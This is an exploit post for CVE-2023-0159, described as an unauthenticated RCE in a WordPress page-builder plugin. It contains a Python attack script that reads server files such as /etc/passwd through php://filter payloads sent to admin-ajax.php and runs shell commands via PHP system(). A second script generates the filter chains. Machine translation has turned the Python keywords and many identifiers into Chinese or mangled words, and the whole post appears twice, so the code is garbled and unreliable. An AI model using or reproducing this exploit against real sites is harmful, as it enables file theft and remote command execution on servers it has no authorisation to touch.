#exploit title: WPBakery页面构建器1.9.1-未经身份验证的RCE
#DATE: 2025年3月12日
#利用作者: Ravina
#供应商homepage: wprealize
#版本: 1.9.1
#在: Windows,Linux上测试
#CVE ID : CVE-2023-0159
#漏洞类型:远程代码执行
---------------------------------------------------------------------
#CVE-2023-0159_SCAN.PY
#!/usr/bin/env Python3
#lfi:/exploit.py-mode lfi -target https://vuln-site.com -file/etc/passwd
#rce:/exploit.py -mode rce -target https://vuln-site.com -command'ID' - generator/path/path/path/path/php_filter_chain_generator.py.pypy
导入argparse
导入请求
导入基础64
导入子过程
进口时间
导入php_filter_chain_generator
def run_lfi(target,file_path):
url=f'{target}/wp-admin/admin-ajax.php'
有效载荷={
'action':'extension_vc_init_shortcode_pagination',
'options [template]': f'phph: //filter/convert.base64-encode/resource={file_path}'
}
TRY:
响应=requests.post(url,data=有效载荷)
如果响应。STATUS_CODE==200和'{'status':'success','Message':'Items已加载','data':'
TRY:
json_data=reverse.json()
BASE64_CONTENT=JSON_DATA ['DATA'] ['项目']
解码=base64.b64decode(base64_content).decode()
打印(f'\ n [+]成功读取{file_path} : \ n')
打印(解码)
除异常外,E:
打印(f'[ - ]解码失败: {str(e)}')
打印(f'raw响应(截断): {response.text [:500]} .')
其他:
print(f'[ - ] lfi失败(status: {response.status_code})')')
除异常外,E:
打印(f'[ - ]请求失败: {str(e)}')
def run_rce(target,命令,generator_path):
#base64编码命令处理特殊字符
encoded_cmd=base64.b64encode(command.encode())。decode()
php_code=f'?php system(base64_decode('{encoded_cmd}'));
#生成过滤链
TRY:
结果=subprocess.run(
[generator_path,' - 链',php_code],
capture_output=true,
text=true,
检查=true
)
有效载荷=无
对于result.stdout.split('\ n'):
如果line.startswith('ph: //filter'):
有效载荷=line.strip()
休息
如果不是有效的:
打印('[ - ]无法生成有效载荷')
返回
url=f'{target}/wp-admin/admin-ajax.php'
data={'action':'Extistion_vc_init_shortcode_pagination','选项[template]':有效载荷}
print(f'[*]发送有效载荷for Command: {command}')
start_time=time.time()
#发送请求尝试RCE,不要忘记通过发电机路径
响应=requests.post(url,data=data)
大量=time.time() - start_time
print(f'\ n [+]响应时间: {elapsed:2f}秒')
print(f'[+]状态码: {response.status_code}')
if antsphy.status_code==200:
打印('\ n [+]响应content:')
print(reversys.text [:1000] +('.'如果Len(wif wifs.text)1000 else''))
除subprocess.calledprocesserror外
print(f'[ - ]过滤链生成器失败: {e.stderr}')
除了FilenotFoundError:
在{generator_path}'上找不到print(f'[ - ]生成器)
除异常外,E:
print(f'[ - ] rce失败: {str(e)}')
def main():
parser=argparse.argumentparser(description='cve-2023-0159 exploit脚本')
parser.add_argument(' - mode',选择=['lfi','rce'],必需=true,help='exploit mode')
parser.add_argument(' - target',必需=true,help='target url(例如3https://Example.com)')
parser.add_argument(' - file',help='lfi模式的文件路径')
parser.add_argument(' - 命令',help='命令执行RCE模式')
parser.add_argument(' - generator',默认='php_filter_chain_generator.py',
help='通往php_filter_chain_generator.py的路径')
args=parser.parse_args()
如果args.mode=='lfi':
如果不是args.file:
打印('[ - ]丢失- lfi模式的文件参数')
返回
run_lfi(args.target.rstrip('/'),args.file)
elif args.mode=='rce':
如果不是args.command:
打印('[ - ]丢失- RCE模式的命令参数')
返回
run_rce(args.target.rstrip('/'),args.command,args.generator)
如果name=='__ -Main __':
主要的()
----------------------------------------------------------
#php_filter_chain_generator.py
#!/usr/bin/env Python3
导入argparse
导入基础64
导入
#无需猜测有效的文件名
file_to_use='php: //temp'
转换={
'0':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.ucs2.ucs2.utf8 | convert.iconv.8859_3.ucs2',
'1':'convert.iconv.iso888597.utf16 | convert.iconv.rk1048.ucs-4le | convert.iconv.utf32.cp1167 | convert.iconv.cp9066.csucs4',
'2':'convert.iconv.l5.utf-32 | convert.iconv.iso888594.gb13000 | convert.iconv.cp949.utf32be | convert.iconv.iso_69372.csibm921',
'3':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.iso6937.8859_4 | convert.iconv.ibm868.utf-16le',
'4':'convert.iconv.cp866.csunicode | convert.iconv.csisolatin5.iso_6937-2 | convert.iconv.cp950.utf-16be',
'5':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.utf16.euctw | convert.iconv.8859_3.ucs2',
'6':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.csibm943.ucs4 | convert.ICONV.IBM866.UCS-2',
'7':'convert.iconv.851.utf-16 | convert.iconv.l1.t.618bit | convert.ICONV.ICONV.ISO-IR-103.850 | CONST.ICONV.PT154.UCS4',
'8':'convert.iconv.iso2022kr.utf16 | convert.iconv.l6.ucs2',
'9':'convert.iconv.csibm1161.unicode | convert.iconv.iso-ir-156.Johab',
'a':'convert.iconv.8859_3.utf16 | convert.iconv.863.shift_jisx0213',
'a':'convert.iconv.cp1046.utf32 | convert.iconv.l6.ucs-2 | convert.iconv.utf-16le.t.61-8bit | convert.iconv.865.ucs-4le',
'b':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000',
'b':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.ucs-2.osf00030010 | convert.iconv.csibm1008.utf32be',
'c':'convert.iconv.utf8.csiso2022kr',
'c':'convert.iconv.l4.utf32 | convert.iconv.cp1250.ucs-2',
'd':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.ibm932.shift_jisx0213',
'd':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.gbk.big5',
'e':'convert.iconv.ibm860.utf16 | convert.iconv.iso-ir-143.iso2022cnext',
'e':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.utf16.euc-jp-ms | convert.iconv.iso-8859-1.iso_6937',
'f':'convert.iconv.l5.utf-32 | convert.iconv.iso88594.gb13000 | convert.iconv.cp950.shift_jisx0213 | convert.iconv.uhc.johab'
'f':'convert.iconv.cp367.utf-16 | convert.iconv.csibm901.shift_jisx0213',
'g':'convert.iconv.se2.utf-16 | convert.iconv.csibm921.naplps | convert.iconv.855.cp936 | convert.iconv.ibm-932.utf-8',
'g':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90',
'h':'convert.iconv.cp1046.utf16 | convert.iconv.iso6937.shift_jisx0213',
'h':'convert.iconv.csgb2312.utf-32 | convert.iconv.ibm-1161.ibm932 | convert.iconv.gb13000.utf16be | convert.iconv.864.utf-32le',
'i':'convert.iconv.l5.utf-32 | convert.iconv.iso888594.gb13000 | convert.iconv.big5.big5.shift_jisx0213',
'I':'convert.iconv.dec.utf-16 | convert.iconv.iso8859-9.iso_6937-2 | convert.iconv.utf16.gb13000',
'j':'convert.iconv.863.unicode | convert.iconv.isiri3342.ucs4',
'j':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000 | convert.iconv.big5.johab | convert.iconv.cp950.utf16',
'k':'convert.iconv.863.utf-16 | convert.iconv.iso6937.utf16le',
'k':'convert.iconv.js.unicode | convert.iconv.l4.ucs2',
'l':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.r9.iso6937 | convert.iconv.osf00010100.uhc',
'l':'convert.iconv.cp-ar.utf16 | convert.iconv.8859_4.big5hkscs | convert.ICONV.MSCP1361.UTF-32LE | CONST.ICONV.ICONV.IBM932.UCS-2BE',
'M':'convert.iconv.cp869.utf-32 | convert.iconv.macuk.ucs4 | convert.iconv.utf16be.866 | convert.iconv.macukrainian.wchar_t',
'M':'convert.iconv.se2.utf-16 | convert.iconv.csibm921.naplps | convert.iconv.cp11633.csa_t500 | convert.iconv.ucs-2.ucs-2.mscp949',
'n':'convert.iconv.cp869.utf-32 | convert.iconv.macuk.ucs4',
'n':'convert.iconv.iso888594.utf16 | convert.iconv.ibm5347.ucs4 | convert.iconv.utf32be.ms936 | convert.iconv.osf000100044.t.61',,
'o':'convert.iconv.csa_t500.utf-32 | convert.ICONV.CP857.ISO-2022-JP-3 | convert.iconv.iso20222jp2.cp7777777777777777777,
'o':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.ucs-4le.osf05010001 | convert.iconv.ibm912.utf-16le',
'p':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.ms932.ms936 | convert.iconv.big5.johab',
'p':'convert.iconv.ibm891.csunicode | convert.iconv.iso88859-14.iso6937 | convert.iconv.big-five.ucs-4',
'q':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.gbk.cp932 | convert.iconv.big5.ucs2',convert.iconv.cp932
'q':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.csa_t500-1983.ucs-2be | convert.iconv.mik.mik.ucs2',
'r':'convert.iconv.pt.utf32 | convert.iconv.koi8-u.ibm-932 | convert.iconv.sjis.eucjp-win | convert.iconv.l10.ucs4',
'r':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.iso-ir-99.ucs-2be | convert.iconv.l4.osf000101011',
's':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.gbk.sjis',
's':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90',
't':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.csa_t500.l4 | convert.iconv.iso_88859-2.iso-ir-ir-103',
't':'convert.iconv.864.utf32 | convert.iconv.ibm912.naplps',
'u':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943',
'u':'convert.iconv.cp1162.utf32 | convert.iconv.l4.t.61',
'v':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000 | convert.iconv.big5.johab',
'v':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.utf16.euctw | convert.iconv.iso-88859-14.ucs2',ucs2',
'w':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.ms932.ms936',
'w':'convert.iconv.mac.utf16 | convert.iconv.l8.utf16be',
'x':'convert.iconv.pt.utf32 | convert.iconv.koi8-u.ibm-932',
'x':'convert.iconv.cp-ar.utf16 | convert.iconv.8859_4.big5hkscs',
'y':'convert.iconv.cp367.utf-16 | convert.iconv.csibm901.shift_jisx0213 | convert.iconv.uhc.cp1361',
'y':'convert.iconv.851.utf-16 | convert.iconv.l1.t.618bit',
'z':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.big5hkscscs.utf16',
'z':'convert.iconv.865.utf16 | convert.iconv.cp901.iso6937',
'/':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.ucs2.ucs2.utf-8 | convert.iconv.csisolatin6.ucs-4',
'+':'convert.iconv.utf8.utf16 | convert.iconv.windows-1258.utf32le | convert.iconv.isiri3342.iso-ir-157',
'=':''
}
def generate_filter_chain(链,debug_base64=false):
encoded_chain=链
#生成一些垃圾base64
filters='convert.iconv.utf8.csiso2022kr |'
过滤器+='convert.base64-consode |'
#确保在我们刚刚生成的字符串和文件的其余部分中摆脱任何平等符号
过滤器+='convert.iconv.utf8.utf7 |'
对于concoded_chain [:-1] :中的c
过滤器+=转换[C] +'|'
#解码和重新编码以摆脱所有不有效base64的一切
过滤器+='convert.base64-decode |'
过滤器+='convert.base64-consode |'
#摆脱平等的迹象
过滤器+='convert.iconv.utf8.utf7 |'
如果不是debug_base64:
#在调试链条时不要添加解码
过滤器+='convert.base64-decode'
final_payload=f'php: //filter/{filters}/resource={file_to_use}'
返回final_payload
def main():
#解析命令行参数
parser=argparse.argumentparser(description='php filter链生成器。')
parser.add_argument(' - 链',help='您要生成的内容。
parser.add_argument(' - rawbase64',help='您要测试的base64值,链条将由php打印为base64,可用于调试。',必需=false)
args=parser.parse_args()
如果args.chain不是没有:
链=args.chain.encode('utf-8')
base64_value=base64.b64encode(链).decode('utf-8')。替换('=','')
链=generate_filter_chain(base64_value)
打印('[+]以下小工具链将生成以下代码: {}(base64 value: {})'。格式(args.chain,base64_value))
印刷(链)
如果args.rawbase64不是没有:
rawbase64=args.rawbase64.replace('=','')
match=re.search('^([a-za-z0-9+/])*$',rawbase64)
如果(匹配):
链=generate_filter_chain(rawbase64,true)
印刷(链)
其他:
打印('[ - ] base64字符串。')
出口(1)
如果name=='__ -Main __':
主要的()
#DATE: 2025年3月12日
#利用作者: Ravina
#供应商homepage: wprealize
#版本: 1.9.1
#在: Windows,Linux上测试
#CVE ID : CVE-2023-0159
#漏洞类型:远程代码执行
---------------------------------------------------------------------
#CVE-2023-0159_SCAN.PY
#!/usr/bin/env Python3
#lfi:/exploit.py-mode lfi -target https://vuln-site.com -file/etc/passwd
#rce:/exploit.py -mode rce -target https://vuln-site.com -command'ID' - generator/path/path/path/path/php_filter_chain_generator.py.pypy
导入argparse
导入请求
导入基础64
导入子过程
进口时间
导入php_filter_chain_generator
def run_lfi(target,file_path):
url=f'{target}/wp-admin/admin-ajax.php'
有效载荷={
'action':'extension_vc_init_shortcode_pagination',
'options [template]': f'phph: //filter/convert.base64-encode/resource={file_path}'
}
TRY:
响应=requests.post(url,data=有效载荷)
如果响应。STATUS_CODE==200和'{'status':'success','Message':'Items已加载','data':'
TRY:
json_data=reverse.json()
BASE64_CONTENT=JSON_DATA ['DATA'] ['项目']
解码=base64.b64decode(base64_content).decode()
打印(f'\ n [+]成功读取{file_path} : \ n')
打印(解码)
除异常外,E:
打印(f'[ - ]解码失败: {str(e)}')
打印(f'raw响应(截断): {response.text [:500]} .')
其他:
print(f'[ - ] lfi失败(status: {response.status_code})')')
除异常外,E:
打印(f'[ - ]请求失败: {str(e)}')
def run_rce(target,命令,generator_path):
#base64编码命令处理特殊字符
encoded_cmd=base64.b64encode(command.encode())。decode()
php_code=f'?php system(base64_decode('{encoded_cmd}'));
#生成过滤链
TRY:
结果=subprocess.run(
[generator_path,' - 链',php_code],
capture_output=true,
text=true,
检查=true
)
有效载荷=无
对于result.stdout.split('\ n'):
如果line.startswith('ph: //filter'):
有效载荷=line.strip()
休息
如果不是有效的:
打印('[ - ]无法生成有效载荷')
返回
url=f'{target}/wp-admin/admin-ajax.php'
data={'action':'Extistion_vc_init_shortcode_pagination','选项[template]':有效载荷}
print(f'[*]发送有效载荷for Command: {command}')
start_time=time.time()
#发送请求尝试RCE,不要忘记通过发电机路径
响应=requests.post(url,data=data)
大量=time.time() - start_time
print(f'\ n [+]响应时间: {elapsed:2f}秒')
print(f'[+]状态码: {response.status_code}')
if antsphy.status_code==200:
打印('\ n [+]响应content:')
print(reversys.text [:1000] +('.'如果Len(wif wifs.text)1000 else''))
除subprocess.calledprocesserror外
print(f'[ - ]过滤链生成器失败: {e.stderr}')
除了FilenotFoundError:
在{generator_path}'上找不到print(f'[ - ]生成器)
除异常外,E:
print(f'[ - ] rce失败: {str(e)}')
def main():
parser=argparse.argumentparser(description='cve-2023-0159 exploit脚本')
parser.add_argument(' - mode',选择=['lfi','rce'],必需=true,help='exploit mode')
parser.add_argument(' - target',必需=true,help='target url(例如3https://Example.com)')
parser.add_argument(' - file',help='lfi模式的文件路径')
parser.add_argument(' - 命令',help='命令执行RCE模式')
parser.add_argument(' - generator',默认='php_filter_chain_generator.py',
help='通往php_filter_chain_generator.py的路径')
args=parser.parse_args()
如果args.mode=='lfi':
如果不是args.file:
打印('[ - ]丢失- lfi模式的文件参数')
返回
run_lfi(args.target.rstrip('/'),args.file)
elif args.mode=='rce':
如果不是args.command:
打印('[ - ]丢失- RCE模式的命令参数')
返回
run_rce(args.target.rstrip('/'),args.command,args.generator)
如果name=='__ -Main __':
主要的()
----------------------------------------------------------
#php_filter_chain_generator.py
#!/usr/bin/env Python3
导入argparse
导入基础64
导入
#无需猜测有效的文件名
file_to_use='php: //temp'
转换={
'0':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.ucs2.ucs2.utf8 | convert.iconv.8859_3.ucs2',
'1':'convert.iconv.iso888597.utf16 | convert.iconv.rk1048.ucs-4le | convert.iconv.utf32.cp1167 | convert.iconv.cp9066.csucs4',
'2':'convert.iconv.l5.utf-32 | convert.iconv.iso888594.gb13000 | convert.iconv.cp949.utf32be | convert.iconv.iso_69372.csibm921',
'3':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.iso6937.8859_4 | convert.iconv.ibm868.utf-16le',
'4':'convert.iconv.cp866.csunicode | convert.iconv.csisolatin5.iso_6937-2 | convert.iconv.cp950.utf-16be',
'5':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.utf16.euctw | convert.iconv.8859_3.ucs2',
'6':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.csibm943.ucs4 | convert.ICONV.IBM866.UCS-2',
'7':'convert.iconv.851.utf-16 | convert.iconv.l1.t.618bit | convert.ICONV.ICONV.ISO-IR-103.850 | CONST.ICONV.PT154.UCS4',
'8':'convert.iconv.iso2022kr.utf16 | convert.iconv.l6.ucs2',
'9':'convert.iconv.csibm1161.unicode | convert.iconv.iso-ir-156.Johab',
'a':'convert.iconv.8859_3.utf16 | convert.iconv.863.shift_jisx0213',
'a':'convert.iconv.cp1046.utf32 | convert.iconv.l6.ucs-2 | convert.iconv.utf-16le.t.61-8bit | convert.iconv.865.ucs-4le',
'b':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000',
'b':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.ucs-2.osf00030010 | convert.iconv.csibm1008.utf32be',
'c':'convert.iconv.utf8.csiso2022kr',
'c':'convert.iconv.l4.utf32 | convert.iconv.cp1250.ucs-2',
'd':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.ibm932.shift_jisx0213',
'd':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.gbk.big5',
'e':'convert.iconv.ibm860.utf16 | convert.iconv.iso-ir-143.iso2022cnext',
'e':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.utf16.euc-jp-ms | convert.iconv.iso-8859-1.iso_6937',
'f':'convert.iconv.l5.utf-32 | convert.iconv.iso88594.gb13000 | convert.iconv.cp950.shift_jisx0213 | convert.iconv.uhc.johab'
'f':'convert.iconv.cp367.utf-16 | convert.iconv.csibm901.shift_jisx0213',
'g':'convert.iconv.se2.utf-16 | convert.iconv.csibm921.naplps | convert.iconv.855.cp936 | convert.iconv.ibm-932.utf-8',
'g':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90',
'h':'convert.iconv.cp1046.utf16 | convert.iconv.iso6937.shift_jisx0213',
'h':'convert.iconv.csgb2312.utf-32 | convert.iconv.ibm-1161.ibm932 | convert.iconv.gb13000.utf16be | convert.iconv.864.utf-32le',
'i':'convert.iconv.l5.utf-32 | convert.iconv.iso888594.gb13000 | convert.iconv.big5.big5.shift_jisx0213',
'I':'convert.iconv.dec.utf-16 | convert.iconv.iso8859-9.iso_6937-2 | convert.iconv.utf16.gb13000',
'j':'convert.iconv.863.unicode | convert.iconv.isiri3342.ucs4',
'j':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000 | convert.iconv.big5.johab | convert.iconv.cp950.utf16',
'k':'convert.iconv.863.utf-16 | convert.iconv.iso6937.utf16le',
'k':'convert.iconv.js.unicode | convert.iconv.l4.ucs2',
'l':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.r9.iso6937 | convert.iconv.osf00010100.uhc',
'l':'convert.iconv.cp-ar.utf16 | convert.iconv.8859_4.big5hkscs | convert.ICONV.MSCP1361.UTF-32LE | CONST.ICONV.ICONV.IBM932.UCS-2BE',
'M':'convert.iconv.cp869.utf-32 | convert.iconv.macuk.ucs4 | convert.iconv.utf16be.866 | convert.iconv.macukrainian.wchar_t',
'M':'convert.iconv.se2.utf-16 | convert.iconv.csibm921.naplps | convert.iconv.cp11633.csa_t500 | convert.iconv.ucs-2.ucs-2.mscp949',
'n':'convert.iconv.cp869.utf-32 | convert.iconv.macuk.ucs4',
'n':'convert.iconv.iso888594.utf16 | convert.iconv.ibm5347.ucs4 | convert.iconv.utf32be.ms936 | convert.iconv.osf000100044.t.61',,
'o':'convert.iconv.csa_t500.utf-32 | convert.ICONV.CP857.ISO-2022-JP-3 | convert.iconv.iso20222jp2.cp7777777777777777777,
'o':'convert.iconv.js.unicode | convert.iconv.l4.ucs2 | convert.iconv.ucs-4le.osf05010001 | convert.iconv.ibm912.utf-16le',
'p':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.ms932.ms936 | convert.iconv.big5.johab',
'p':'convert.iconv.ibm891.csunicode | convert.iconv.iso88859-14.iso6937 | convert.iconv.big-five.ucs-4',
'q':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.gbk.cp932 | convert.iconv.big5.ucs2',convert.iconv.cp932
'q':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.csa_t500-1983.ucs-2be | convert.iconv.mik.mik.ucs2',
'r':'convert.iconv.pt.utf32 | convert.iconv.koi8-u.ibm-932 | convert.iconv.sjis.eucjp-win | convert.iconv.l10.ucs4',
'r':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.iso-ir-99.ucs-2be | convert.iconv.l4.osf000101011',
's':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943 | convert.iconv.gbk.sjis',
's':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90',
't':'convert.iconv.l6.unicode | convert.iconv.cp1282.iso-ir-90 | convert.iconv.csa_t500.l4 | convert.iconv.iso_88859-2.iso-ir-ir-103',
't':'convert.iconv.864.utf32 | convert.iconv.ibm912.naplps',
'u':'convert.iconv.inis.utf16 | convert.iconv.csibm1133.ibm943',
'u':'convert.iconv.cp1162.utf32 | convert.iconv.l4.t.61',
'v':'convert.iconv.cp861.utf-16 | convert.iconv.l4.gb13000 | convert.iconv.big5.johab',
'v':'convert.iconv.utf8.utf16le | convert.iconv.utf8.csiso2022kr | convert.iconv.utf16.euctw | convert.iconv.iso-88859-14.ucs2',ucs2',
'w':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.ms932.ms936',
'w':'convert.iconv.mac.utf16 | convert.iconv.l8.utf16be',
'x':'convert.iconv.pt.utf32 | convert.iconv.koi8-u.ibm-932',
'x':'convert.iconv.cp-ar.utf16 | convert.iconv.8859_4.big5hkscs',
'y':'convert.iconv.cp367.utf-16 | convert.iconv.csibm901.shift_jisx0213 | convert.iconv.uhc.cp1361',
'y':'convert.iconv.851.utf-16 | convert.iconv.l1.t.618bit',
'z':'convert.iconv.se2.utf-16 | convert.iconv.csibm1161.ibm-932 | convert.iconv.big5hkscscs.utf16',
'z':'convert.iconv.865.utf16 | convert.iconv.cp901.iso6937',
'/':'convert.iconv.ibm869.utf16 | convert.iconv.l3.csiso90 | convert.iconv.ucs2.ucs2.utf-8 | convert.iconv.csisolatin6.ucs-4',
'+':'convert.iconv.utf8.utf16 | convert.iconv.windows-1258.utf32le | convert.iconv.isiri3342.iso-ir-157',
'=':''
}
def generate_filter_chain(链,debug_base64=false):
encoded_chain=链
#生成一些垃圾base64
filters='convert.iconv.utf8.csiso2022kr |'
过滤器+='convert.base64-consode |'
#确保在我们刚刚生成的字符串和文件的其余部分中摆脱任何平等符号
过滤器+='convert.iconv.utf8.utf7 |'
对于concoded_chain [:-1] :中的c
过滤器+=转换[C] +'|'
#解码和重新编码以摆脱所有不有效base64的一切
过滤器+='convert.base64-decode |'
过滤器+='convert.base64-consode |'
#摆脱平等的迹象
过滤器+='convert.iconv.utf8.utf7 |'
如果不是debug_base64:
#在调试链条时不要添加解码
过滤器+='convert.base64-decode'
final_payload=f'php: //filter/{filters}/resource={file_to_use}'
返回final_payload
def main():
#解析命令行参数
parser=argparse.argumentparser(description='php filter链生成器。')
parser.add_argument(' - 链',help='您要生成的内容。
parser.add_argument(' - rawbase64',help='您要测试的base64值,链条将由php打印为base64,可用于调试。',必需=false)
args=parser.parse_args()
如果args.chain不是没有:
链=args.chain.encode('utf-8')
base64_value=base64.b64encode(链).decode('utf-8')。替换('=','')
链=generate_filter_chain(base64_value)
打印('[+]以下小工具链将生成以下代码: {}(base64 value: {})'。格式(args.chain,base64_value))
印刷(链)
如果args.rawbase64不是没有:
rawbase64=args.rawbase64.replace('=','')
match=re.search('^([a-za-z0-9+/])*$',rawbase64)
如果(匹配):
链=generate_filter_chain(rawbase64,true)
印刷(链)
其他:
打印('[ - ] base64字符串。')
出口(1)
如果name=='__ -Main __':
主要的()